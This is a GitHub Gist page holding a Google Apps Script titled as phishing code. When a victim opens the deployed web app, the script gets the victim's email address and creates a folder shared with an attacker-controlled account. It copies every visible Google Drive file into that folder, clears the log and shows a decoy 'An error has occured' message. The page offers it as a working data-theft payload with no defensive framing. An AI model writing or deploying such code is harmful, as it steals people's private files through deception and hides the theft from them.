-
-
Save srand2/d3f33bb8646a63f0a070da1ebecbc246 to your computer and use it in GitHub Desktop.
Google App Script Phishing #2
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function driveSearch() { | |
| // Setup the exfil folder | |
| var user = Session.getActiveUser().getEmail(); | |
| var folder = DriveApp.createFolder(user); | |
| var attackerEmail = "[email protected]"; | |
| folder.addViewer(attackerEmail); | |
| // Search Drive | |
| var files = DriveApp.searchFiles('hidden = false'); | |
| // Iterate through files in Drive | |
| while (files.hasNext()) { | |
| var file = files.next(); | |
| var name = file.getName(); | |
| Logger.log(name); | |
| // Exfiltrate each file | |
| //file.addViewer(attackerEmail); | |
| file.makeCopy(name, folder); | |
| } | |
| Logger.clear(); | |
| } | |
| function doGet(e) { | |
| var params = JSON.stringify(e); | |
| driveSearch(); | |
| return HtmlService.createHtmlOutput('An error has occured'); | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment